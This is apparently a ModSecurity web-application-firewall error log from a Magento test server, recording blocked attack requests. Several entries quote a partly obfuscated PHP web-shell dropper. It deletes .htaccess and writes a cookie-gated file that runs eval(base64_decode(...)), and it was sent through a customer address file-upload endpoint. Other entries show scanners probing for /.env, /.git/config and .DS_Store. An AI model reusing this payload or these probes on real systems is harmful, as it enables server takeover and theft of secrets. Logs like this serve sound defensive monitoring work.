[Fri Nov 28 05:09:58.106195 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: nc88364f428d25.php8 found within FILES:custom_attributes[country_id]: nc88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSkglhY37ftiQrkmT0VbBgAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/n/c/nc88364f428d25.phar
[Fri Nov 28 05:09:58.106873 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSkglhY37ftiQrkmT0VbBgAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/n/c/nc88364f428d25.phar
[Fri Nov 28 05:09:58.107048 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSkglhY37ftiQrkmT0VbBgAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/n/c/nc88364f428d25.phar
[Fri Nov 28 05:09:58.201785 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Rule 7fa16a338be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/c/nc88364f428d25.php8"] [unique_id "aSkglhY37ftiQrkmT0VbBwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:09:58.202257 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/c/nc88364f428d25.php8"] [unique_id "aSkglhY37ftiQrkmT0VbBwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:09:58.204729 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/c/nc88364f428d25.php8"] [unique_id "aSkglhY37ftiQrkmT0VbBwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:09:58.204916 2025] [:error] [pid 376626] [client 144.124.225.151:53776] [client 144.124.225.151] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/c/nc88364f428d25.php8"] [unique_id "aSkglhY37ftiQrkmT0VbBwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:10:04.906246 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Rule 7fa16a338be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/w/5w88364f428d25.phar"] [unique_id "aSkgnA-9erAMS4LBdXdtYgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:10:04.906967 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/w/5w88364f428d25.phar"] [unique_id "aSkgnA-9erAMS4LBdXdtYgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:10:04.910241 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/w/5w88364f428d25.phar"] [unique_id "aSkgnA-9erAMS4LBdXdtYgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:10:04.910530 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/w/5w88364f428d25.phar"] [unique_id "aSkgnA-9erAMS4LBdXdtYgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:10:05.130694 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 5w88364f428d25.php8 found within FILES:custom_attributes[country_id]: 5w88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSkgnQ-9erAMS4LBdXdtYwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/w/5w88364f428d25.phar
[Fri Nov 28 05:10:05.131384 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSkgnQ-9erAMS4LBdXdtYwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/w/5w88364f428d25.phar
[Fri Nov 28 05:10:05.131582 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aSkgnQ-9erAMS4LBdXdtYwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/w/5w88364f428d25.phar
[Fri Nov 28 05:10:05.783827 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Rule 7fa16a338be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/w/5w88364f428d25.php8"] [unique_id "aSkgnQ-9erAMS4LBdXdtZAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:10:05.784299 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/w/5w88364f428d25.php8"] [unique_id "aSkgnQ-9erAMS4LBdXdtZAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:10:05.787760 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/w/5w88364f428d25.php8"] [unique_id "aSkgnQ-9erAMS4LBdXdtZAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 05:10:05.787972 2025] [:error] [pid 376321] [client 37.112.223.135:44454] [client 37.112.223.135] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/w/5w88364f428d25.php8"] [unique_id "aSkgnQ-9erAMS4LBdXdtZAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Nov 28 06:41:55.983607 2025] [authz_core:error] [pid 376661] [client 139.59.136.184:39558] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 28 06:41:57.490097 2025] [:error] [pid 376626] [client 139.59.136.184:39570] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSk2JRY37ftiQrkmT0VbFwAAAAc"]
[Fri Nov 28 06:41:57.490369 2025] [:error] [pid 376626] [client 139.59.136.184:39570] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSk2JRY37ftiQrkmT0VbFwAAAAc"]
[Fri Nov 28 06:41:57.490559 2025] [:error] [pid 376626] [client 139.59.136.184:39570] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSk2JRY37ftiQrkmT0VbFwAAAAc"]
[Fri Nov 28 06:41:57.859290 2025] [:error] [pid 376631] [client 139.59.136.184:39576] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSk2JZjihkEKa1eLtZQNJQAAAAw"]
[Fri Nov 28 06:41:57.859532 2025] [:error] [pid 376631] [client 139.59.136.184:39576] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSk2JZjihkEKa1eLtZQNJQAAAAw"]
[Fri Nov 28 06:41:57.859709 2025] [:error] [pid 376631] [client 139.59.136.184:39576] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSk2JZjihkEKa1eLtZQNJQAAAAw"]
[Fri Nov 28 06:41:58.162137 2025] [:error] [pid 376321] [client 139.59.136.184:60818] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSk2Jg-9erAMS4LBdXdtdAAAAAA"]
[Fri Nov 28 06:41:58.162417 2025] [:error] [pid 376321] [client 139.59.136.184:60818] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSk2Jg-9erAMS4LBdXdtdAAAAAA"]
[Fri Nov 28 06:41:58.162581 2025] [:error] [pid 376321] [client 139.59.136.184:60818] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSk2Jg-9erAMS4LBdXdtdAAAAAA"]
[Fri Nov 28 13:27:23.515057 2025] [authz_core:error] [pid 384069] [client 64.227.70.2:57012] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Nov 28 13:27:25.618286 2025] [:error] [pid 383778] [client 64.227.70.2:57040] [client 64.227.70.2] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSmVLVkALeIJks_pKUvm_QAAABU"]
[Fri Nov 28 13:27:25.618568 2025] [:error] [pid 383778] [client 64.227.70.2:57040] [client 64.227.70.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSmVLVkALeIJks_pKUvm_QAAABU"]
[Fri Nov 28 13:27:25.618749 2025] [:error] [pid 383778] [client 64.227.70.2:57040] [client 64.227.70.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSmVLVkALeIJks_pKUvm_QAAABU"]
[Fri Nov 28 13:27:26.208669 2025] [:error] [pid 381109] [client 64.227.70.2:57042] [client 64.227.70.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSmVLuhaa_ABFroPvQ_cxwAAABY"]
[Fri Nov 28 13:27:26.208941 2025] [:error] [pid 381109] [client 64.227.70.2:57042] [client 64.227.70.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSmVLuhaa_ABFroPvQ_cxwAAABY"]
[Fri Nov 28 13:27:26.209116 2025] [:error] [pid 381109] [client 64.227.70.2:57042] [client 64.227.70.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSmVLuhaa_ABFroPvQ_cxwAAABY"]
[Fri Nov 28 13:27:26.653857 2025] [:error] [pid 384067] [client 64.227.70.2:57046] [client 64.227.70.2] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSmVLt1sP_DH5i5fGun4eQAAAAQ"]
[Fri Nov 28 13:27:26.654115 2025] [:error] [pid 384067] [client 64.227.70.2:57046] [client 64.227.70.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSmVLt1sP_DH5i5fGun4eQAAAAQ"]
